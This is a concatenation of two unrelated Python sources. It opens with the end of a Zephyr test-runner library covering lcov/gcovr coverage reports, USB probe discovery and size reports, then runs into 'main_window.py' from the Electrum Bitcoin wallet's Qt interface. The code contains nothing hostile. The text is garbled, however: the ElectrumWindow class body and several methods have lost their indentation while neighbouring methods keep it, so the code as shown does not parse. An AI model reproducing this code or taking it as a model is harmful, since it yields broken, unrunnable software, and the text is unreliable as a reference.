            # BUGFIX: this branch previously instantiated Lcov(), so
            # requesting gcovr silently ran lcov instead.
            t = Gcovr()
        else:
            logger.error("Unsupported coverage tool specified: {}".format(tool))
            return None

        t.gcov_tool = tool
        return t

    @staticmethod
    def retrieve_gcov_data(input_file):
        """Extract the coverage dump section from a handler.log.

        Returns ``{'complete': bool, 'data': {file_name: hex_dump}}``.
        'complete' is True when the END marker was seen, or when no dump
        was present at all.  (Parameter renamed from the original typo
        ``intput_file``; internal callers pass it positionally.)
        """
        logger.debug("Working on %s" % input_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(input_file, 'r') as fp:
            for line in fp.readlines():
                if re.search("GCOV_COVERAGE_DUMP_START", line):
                    capture_data = True
                    continue
                if re.search("GCOV_COVERAGE_DUMP_END", line):
                    capture_complete = True
                    break
                # Loop until the coverage data is found.
                if not capture_data:
                    continue
                if line.startswith("*"):
                    sp = line.split("<")
                    if len(sp) > 1:
                        # Remove the leading delimiter "*"
                        file_name = sp[0][1:]
                        # Remove the trailing new line char
                        hex_dump = sp[1][:-1]
                    else:
                        continue
                else:
                    continue
                extracted_coverage_info.update({file_name: hex_dump})
        # a log with no dump at all counts as "complete"
        if not capture_data:
            capture_complete = True
        return {'complete': capture_complete, 'data': extracted_coverage_info}

    @staticmethod
    def create_gcda_files(extracted_coverage_info):
        """Write each extracted hex dump back out as a .gcda file on disk."""
        logger.debug("Generating gcda files")
        for filename, hexdump_val in extracted_coverage_info.items():
            # if kobject_hash is given for coverage gcovr fails
            # hence skipping it problem only in gcovr v4.1
            if "kobject_hash" in filename:
                filename = (filename[:-4]) + "gcno"
                try:
                    os.remove(filename)
                except Exception:
                    pass
                continue

            with open(filename, 'wb') as fp:
                fp.write(bytes.fromhex(hexdump_val))

    def generate(self, outdir):
        """Collect gcov dumps from every handler.log under *outdir*, then
        run the tool-specific report generator (``self._generate``)."""
        for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
            gcov_data = self.__class__.retrieve_gcov_data(filename)
            capture_complete = gcov_data['complete']
            extracted_coverage_info = gcov_data['data']
            if capture_complete:
                self.__class__.create_gcda_files(extracted_coverage_info)
                logger.debug("Gcov data captured: {}".format(filename))
            else:
                logger.error("Gcov data capture incomplete: {}".format(filename))

        with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
            ret = self._generate(outdir, coveragelog)
            if ret == 0:
                logger.info("HTML report generated: {}".format(
                    os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
    """Coverage report generation driven by lcov/genhtml."""

    def __init__(self):
        super().__init__()
        # Glob patterns handed to `lcov --remove`.
        self.ignores = []

    def add_ignore_file(self, pattern):
        # lcov exclusions are glob patterns: match the file anywhere in a path
        self.ignores.append('*' + pattern + '*')

    def add_ignore_directory(self, pattern):
        # exclude everything below the given directory
        self.ignores.append(pattern + '/*')

    def _generate(self, outdir, coveragelog):
        """Capture coverage info with lcov, apply filters, and render HTML
        via genhtml.  Returns genhtml's exit status (0 on success)."""
        coveragefile = os.path.join(outdir, "coverage.info")
        ztestfile = os.path.join(outdir, "ztest.info")
        subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
                         "--capture", "--directory", outdir,
                         "--rc", "lcov_branch_coverage=1",
                         "--output-file", coveragefile], stdout=coveragelog)
        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
                         coveragefile,
                         os.path.join(self.base_dir, "tests", "ztest", "*"),
                         "--output-file", ztestfile,
                         "--rc", "lcov_branch_coverage=1"], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                             ztestfile,
                             os.path.join(self.base_dir, "tests/ztest/test/*"),
                             "--output-file", ztestfile,
                             "--rc", "lcov_branch_coverage=1"],
                            stdout=coveragelog)
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        # strip every user-registered ignore pattern from the capture
        for i in self.ignores:
            subprocess.call(
                ["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                 coveragefile, i, "--output-file",
                 coveragefile, "--rc", "lcov_branch_coverage=1"],
                stdout=coveragelog)

        # The --ignore-errors source option is added to avoid it exiting due to
        # samples/application_development/external_lib/
        return subprocess.call(["genhtml", "--legend", "--branch-coverage",
                                "--ignore-errors", "source",
                                "-output-directory",
                                os.path.join(outdir, "coverage")] + files,
                               stdout=coveragelog)
class Gcovr(CoverageTool):
    """Coverage report generation driven by gcovr (JSON traces + HTML)."""

    def __init__(self):
        super().__init__()
        # Regex patterns handed to gcovr's -e (exclude) option.
        self.ignores = []

    def add_ignore_file(self, pattern):
        # gcovr exclusions are regexes, not globs
        self.ignores.append('.*' + pattern + '.*')

    def add_ignore_directory(self, pattern):
        self.ignores.append(pattern + '/.*')

    @staticmethod
    def _interleave_list(prefix, items):
        """Return ``[prefix, items[0], prefix, items[1], ...]``.

        (Second parameter renamed from ``list``, which shadowed the
        builtin; it is only called positionally within this class.)
        """
        tuple_list = [(prefix, item) for item in items]
        return [item for sublist in tuple_list for item in sublist]

    def _generate(self, outdir, coveragelog):
        """Run gcovr to produce JSON trace files, then merge them into an
        HTML report.  Returns the final gcovr exit status (0 on success)."""
        coveragefile = os.path.join(outdir, "coverage.json")
        ztestfile = os.path.join(outdir, "ztest.json")

        excludes = Gcovr._interleave_list("-e", self.ignores)

        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
                         self.gcov_tool, "-e", "tests/*"] + excludes +
                        ["--json", "-o", coveragefile, outdir],
                        stdout=coveragelog)

        subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
                         self.gcov_tool, "-f", "tests/ztest", "-e",
                         "tests/ztest/test/*", "--json", "-o", ztestfile,
                         outdir], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        subdir = os.path.join(outdir, "coverage")
        os.makedirs(subdir, exist_ok=True)

        tracefiles = self._interleave_list("--add-tracefile", files)

        return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
                                "--html-details"] + tracefiles +
                               ["-o", os.path.join(subdir, "index.html")],
                               stdout=coveragelog)
class HardwareMap:
    """Inventory of debug probes / boards attached to the host.

    Devices are discovered over USB serial (``scan_hw``), loaded from a
    YAML map file, or registered from the command line; ``write_map``
    reconciles a fresh scan with an existing map file.
    """

    schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")

    # USB manufacturer strings recognised as supported probes/boards.
    manufacturer = [
        'ARM',
        'SEGGER',
        'MBED',
        'STMicroelectronics',
        'Atmel Corp.',
        'Texas Instruments',
        'Silicon Labs',
        'NXP Semiconductors',
        'Microchip Technology Inc.',
        'FTDI',
        'Digilent'
    ]

    # Map from flash runner name to the USB product strings (exact names
    # or regexes) it can drive.
    runner_mapping = {
        'pyocd': [
            'DAPLink CMSIS-DAP',
            'MBED CMSIS-DAP'
        ],
        'jlink': [
            'J-Link',
            'J-Link OB'
        ],
        'openocd': [
            'STM32 STLink', '^XDS110.*'
        ],
        'dediprog': [
            'TTL232R-3V3',
            'MCP2200 USB Serial Port Emulator'
        ]
    }

    def __init__(self):
        self.detected = []            # devices found by scan_hw()
        self.connected_hardware = []  # devices loaded from map/cmdline

    def load_device_from_cmdline(self, serial, platform):
        """Register a single always-available device described on the
        command line."""
        device = {
            "serial": serial,
            "platform": platform,
            "counter": 0,
            "available": True,
            "connected": True
        }
        self.connected_hardware.append(device)

    def load_hardware_map(self, map_file):
        """Load *map_file* (schema-validated YAML) into
        ``connected_hardware`` and reset each device's usage counter."""
        hwm_schema = scl.yaml_load(self.schema_path)
        self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
        for i in self.connected_hardware:
            i['counter'] = 0

    def scan_hw(self):
        """Scan USB serial ports and append recognised devices to
        ``self.detected``."""
        from serial.tools import list_ports
        serial_devices = list_ports.comports()
        logger.info("Scanning connected hardware...")
        for d in serial_devices:
            if d.manufacturer in self.manufacturer:
                # TI XDS110 can have multiple serial devices for a single board
                # assume endpoint 0 is the serial, skip all others
                if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
                    continue
                s_dev = {}
                s_dev['platform'] = "unknown"
                s_dev['id'] = d.serial_number
                s_dev['serial'] = d.device
                s_dev['product'] = d.product
                s_dev['runner'] = 'unknown'
                for runner, _ in self.runner_mapping.items():
                    products = self.runner_mapping.get(runner)
                    if d.product in products:
                        s_dev['runner'] = runner
                        continue
                    # Try regex matching
                    for p in products:
                        if re.match(p, d.product):
                            s_dev['runner'] = runner

                s_dev['available'] = True
                s_dev['connected'] = True
                self.detected.append(s_dev)
            else:
                logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))

    def write_map(self, hwm_file):
        """Merge the current scan into *hwm_file* (or create it).

        Existing entries are marked disconnected, then re-connected when a
        scanned device matches on id+product; unmatched scanned devices are
        appended as new entries.
        """
        # use existing map
        if os.path.exists(hwm_file):
            with open(hwm_file, 'r') as yaml_file:
                hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
                # disconnect everything
                for h in hwm:
                    h['connected'] = False
                    h['serial'] = None

                for d in self.detected:
                    for h in hwm:
                        if d['id'] == h['id'] and d['product'] == h['product']:
                            h['connected'] = True
                            h['serial'] = d['serial']
                            d['match'] = True

                new = list(filter(lambda n: not n.get('match', False), self.detected))
                hwm = hwm + new

                logger.info("Registered devices:")
                self.dump(hwm)

            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(hwm, yaml_file, default_flow_style=False)

        else:
            # create new file
            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(self.detected, yaml_file, default_flow_style=False)
            logger.info("Detected devices:")
            self.dump(self.detected)

    @staticmethod
    def dump(hwmap=None, filtered=None, header=None, connected_only=False):
        """Pretty-print a hardware map as a github-style table.

        Fix: defaults were previously mutable lists (``[]``), the classic
        shared-default pitfall; ``None`` sentinels are behavior-compatible.
        """
        print("")
        table = []
        if not header:
            header = ["Platform", "ID", "Serial device"]
        for p in sorted(hwmap or [], key=lambda i: i['platform']):
            platform = p.get('platform')
            connected = p.get('connected', False)
            if filtered and platform not in filtered:
                continue
            if not connected_only or connected:
                table.append([platform, p.get('id', None), p.get('serial')])
        print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
    """Log a per-section size table followed by ROM/RAM totals.

    *sc* is a size-calculator-like object: the code reads ``filename``,
    ``sections`` (list of dicts with keys name/virt_addr/load_addr/size/
    type), ``rom_size`` and ``ram_size``.
    """
    logger.info(sc.filename)
    logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
    # Iterate the sections directly instead of indexing via range(len(...)).
    for v in sc.sections:
        logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
                    (v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
                     v["type"]))

    logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
                (sc.rom_size, sc.ram_size))
    logger.info("")
def export_tests(filename, tests):
    """Export dotted test identifiers ("section.subsection...") to a CSV
    with columns section/subsection/title/reference (no header row).

    Identifiers without a '.' cannot be split and are only logged.
    """
    fieldnames = ['section', 'subsection', 'title', 'reference']
    with open(filename, "wt") as out:
        writer = csv.DictWriter(out, fieldnames, lineterminator=os.linesep)
        for identifier in tests:
            parts = identifier.split(".")
            if len(parts) > 1:
                writer.writerow({
                    "section": parts[0].capitalize(),
                    # underscores become spaces, title-cased
                    "subsection": " ".join(parts[1].split("_")).title(),
                    "title": identifier,
                    "reference": identifier,
                })
            else:
                logger.info("{} can't be exported".format(identifier))
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
    """Flat, icon-only button shown in the window's status bar.

    Activating the button — by click or by pressing Return/Enter while it
    has focus — invokes *func* with no arguments.
    """
    # note: this class has a custom stylesheet applied in stylesheet_patcher.py

    def __init__(self, icon, tooltip, func):
        QToolButton.__init__(self)
        self.func = func
        # appearance
        self.setText('')
        self.setIcon(icon)
        self.setIconSize(QSize(25, 25))
        self.setMaximumWidth(25)
        self.setToolTip(tooltip)
        self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.setAutoRaise(True)
        self.setCursor(QCursor(Qt.PointingHandCursor))
        # behaviour
        self.clicked.connect(self.onPress)

    def onPress(self, checked=False):
        """Drop the unwanted PyQt5 "checked" argument and invoke func."""
        self.func()

    def keyPressEvent(self, e):
        """Treat Return/Enter as button activation."""
        if e.key() in (Qt.Key_Return, Qt.Key_Enter):
            self.func()
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # keep prompting until a password validates, or the user cancels
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue
            break

        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
    """Build the main wallet window: state, tabs, status bar, shortcuts,
    network callbacks and the optional update-check thread."""
    QMainWindow.__init__(self)

    self.gui_object = gui_object
    self.config = config = gui_object.config  # type: SimpleConfig
    self.gui_thread = gui_object.gui_thread
    assert wallet, "no wallet"
    self.wallet = wallet
    if wallet.has_lightning():
        self.wallet.config.set_key('show_channels_tab', True)

    self.setup_exception_hook()
    self.network = gui_object.daemon.network  # type: Network
    self.fx = gui_object.daemon.fx  # type: FxThread
    self.contacts = wallet.contacts
    self.tray = gui_object.tray
    self.app = gui_object.app
    self.cleaned_up = False
    self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
    self.payto_URI = None
    self.checking_accounts = False
    self.qr_window = None
    self.pluginsdialog = None
    self.showing_cert_mismatch_error = False
    self.tl_windows = []
    self.pending_invoice = None
    Logger.__init__(self)

    self.tx_notification_queue = queue.Queue()
    self.tx_notification_last_time = 0

    self.create_status_bar()
    self.need_update = threading.Event()

    self.completions = QStringListModel()

    coincontrol_sb = self.create_coincontrol_statusbar()

    # --- tabs: history/send/receive are always shown, the rest optional
    self.tabs = tabs = QTabWidget(self)
    self.send_tab = self.create_send_tab()
    self.receive_tab = self.create_receive_tab()
    self.addresses_tab = self.create_addresses_tab()
    self.utxo_tab = self.create_utxo_tab()
    self.console_tab = self.create_console_tab()
    self.contacts_tab = self.create_contacts_tab()
    self.channels_tab = self.create_channels_tab()
    tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
    tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
    tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

    def add_optional_tab(tabs, tab, icon, description, name):
        # Optional tabs are only added when 'show_<name>_tab' is set in
        # the config; metadata is stashed on the widget for toggle_tab().
        tab.tab_icon = icon
        tab.tab_description = description
        tab.tab_pos = len(tabs)
        tab.tab_name = name
        if self.config.get('show_{}_tab'.format(name), False):
            tabs.addTab(tab, icon, description.replace("&", ""))

    add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
    add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
    add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
    add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
    add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")

    tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)

    central_widget = QWidget()
    vbox = QVBoxLayout(central_widget)
    vbox.setContentsMargins(0, 0, 0, 0)
    vbox.addWidget(tabs)
    vbox.addWidget(coincontrol_sb)

    self.setCentralWidget(central_widget)

    if self.config.get("is_maximized"):
        self.showMaximized()

    self.setWindowIcon(read_QIcon("electrum.png"))
    self.init_menubar()

    # keyboard shortcuts; wrtabs is a weak proxy so the lambdas don't
    # keep the tab widget alive
    wrtabs = weakref.proxy(tabs)
    QShortcut(QKeySequence("Ctrl+W"), self, self.close)
    QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
    QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
    QShortcut(QKeySequence("F5"), self, self.update_wallet)
    QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
    QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))

    for i in range(wrtabs.count()):
        QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))

    self.payment_request_ok_signal.connect(self.payment_request_ok)
    self.payment_request_error_signal.connect(self.payment_request_error)
    self.show_error_signal.connect(self.show_error)
    self.history_list.setFocus(True)

    # network callbacks
    if self.network:
        self.network_signal.connect(self.on_network_qt)
        interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                     'new_transaction', 'status',
                     'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
                     'on_history', 'channel', 'channels_updated',
                     'payment_failed', 'payment_succeeded',
                     'invoice_status', 'request_status', 'ln_gossip_sync_progress',
                     'cert_mismatch', 'gossip_db_loaded']
        # To avoid leaking references to "self" that prevent the
        # window from being GC-ed when closed, callbacks should be
        # methods of this class only, and specifically not be
        # partials, lambdas or methods of subobjects. Hence...
        util.register_callback(self.on_network, interests)
        # set initial message
        self.console.showMessage(self.network.banner)

    # update fee slider in case we missed the callback
    #self.fee_slider.update()
    self.load_wallet(wallet)
    gui_object.timer.timeout.connect(self.timer_actions)
    self.fetch_alias()

    # If the option hasn't been set yet
    if config.get('check_updates') is None:
        choice = self.question(title="Electrum - " + _("Enable update check"),
                               msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                   _("Would you like to be notified when there is a newer version of Electrum available?"))
        config.set_key('check_updates', bool(choice), save=True)

    if config.get('check_updates', False):
        # The references to both the thread and the window need to be stored somewhere
        # to prevent GC from getting in our way.
        def on_version_received(v):
            if UpdateCheck.is_newer(v):
                self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                self.update_check_button.show()
        self._update_check_thread = UpdateCheckThread()
        self._update_check_thread.checked.connect(on_version_received)
        self._update_check_thread.start()
def setup_exception_hook(self):
    """Install the process-wide exception hook (idempotent) so uncaught
    errors can be reported with wallet/config context."""
    Exception_Hook.maybe_setup(wallet=self.wallet,
                               config=self.config)
def run_coroutine_from_thread(self, coro, on_result=None):
    """Run *coro* on the network's asyncio loop, from the wallet thread.

    The task is queued on ``self.wallet.thread``; it blocks that thread
    until the coroutine finishes, then invokes *on_result* (if given) with
    the result.  Any exception is logged and surfaced to the user via
    ``show_error_signal``.
    """
    def task():
        try:
            f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            # blocks the wallet thread (not the GUI thread) until done
            r = f.result()
            if on_result:
                on_result(r)
        except Exception as e:
            self.logger.exception("exception in coro scheduled via window.wallet")
            self.show_error_signal.emit(str(e))
    self.wallet.thread.add(task)
def on_fx_history(self):
    """Refresh the history model and address list after new fiat
    exchange-rate history arrives."""
    self.history_model.refresh('fx_history')
    self.address_list.update()
def on_fx_quotes(self):
    """React to fresh fiat exchange-rate quotes: refresh the status bar,
    re-trigger the amount edits so fiat/BTC fields are recomputed, and
    refresh the history tab if it used spot rates."""
    self.update_status()
    # Refresh edits with the new rate
    edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
    edit.textEdited.emit(edit.text())
    edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
    edit.textEdited.emit(edit.text())
    # History tab needs updating if it used spot
    if self.fx.history_used_spot:
        self.history_model.refresh('fx_quotes')
    self.address_list.update()
def toggle_tab(self, tab):
    """Show or hide an optional tab, persisting the choice in the config
    and updating its menu entry text.

    When showing, the tab is inserted at the position implied by its
    original ``tab_pos`` relative to the tabs currently visible.
    """
    show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
    self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
    item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
    tab.menu_action.setText(item_text)
    if show:
        # Find out where to place the tab
        index = len(self.tabs)
        for i in range(len(self.tabs)):
            try:
                # mandatory tabs have no tab_pos attribute; skip them
                if tab.tab_pos < self.tabs.widget(i).tab_pos:
                    index = i
                    break
            except AttributeError:
                pass
        self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
    else:
        i = self.tabs.indexOf(tab)
        self.tabs.removeTab(i)
def push_top_level_window(self, window):
    """Record *window* as the current top-level dialog.

    Used for e.g. tx dialog boxes so that new dialogs are parented to the
    right window; explicit parents are not something hardware wallet
    prompts know about.
    """
    self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
    def on_error(self, exc_info):
        """Present an exception (e.g. from the wallet's TaskThread) to the user.

        UserCancelled is silently ignored; UserFacingException shows only its
        message; anything else is logged and shown as its repr.
        """
        e = exc_info[1]
        if isinstance(e, UserCancelled):
            pass
        elif isinstance(e, UserFacingException):
            self.show_error(str(e))
        else:
            # TODO would be nice if we just sent these to the crash reporter...
            # anything we don't want to send there, we should explicitly catch
            # send_exception_to_crash_reporter(e)
            try:
                self.logger.error("on_error", exc_info=exc_info)
            except OSError:
                pass # see #4418
            self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
    def on_network_qt(self, event, args=None):
        # Handle a network message in the GUI thread
        # note: all windows get events from all wallets!
        # Wallet-scoped events therefore compare args[0] against self.wallet
        # before acting; unknown events are merely logged.
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                self.tx_notification_queue.put(tx)
        elif event == 'on_quotes':
            self.on_fx_quotes()
        elif event == 'on_history':
            self.on_fx_history()
        elif event == 'gossip_db_loaded':
            self.channels_list.gossip_db_loaded.emit(*args)
        elif event == 'channels_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_rows.emit(*args)
        elif event == 'channel':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_single_row.emit(*args)
                self.update_status()
        elif event == 'request_status':
            self.on_request_status(*args)
        elif event == 'invoice_status':
            self.on_invoice_status(*args)
        elif event == 'payment_succeeded':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_succeeded(*args)
        elif event == 'payment_failed':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_failed(*args)
        elif event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            pass
        elif event == 'fee_histogram':
            self.history_model.on_fee_histogram()
        elif event == 'ln_gossip_sync_progress':
            self.update_lightning_icon()
        elif event == 'cert_mismatch':
            self.show_cert_mismatch_error()
        else:
            self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
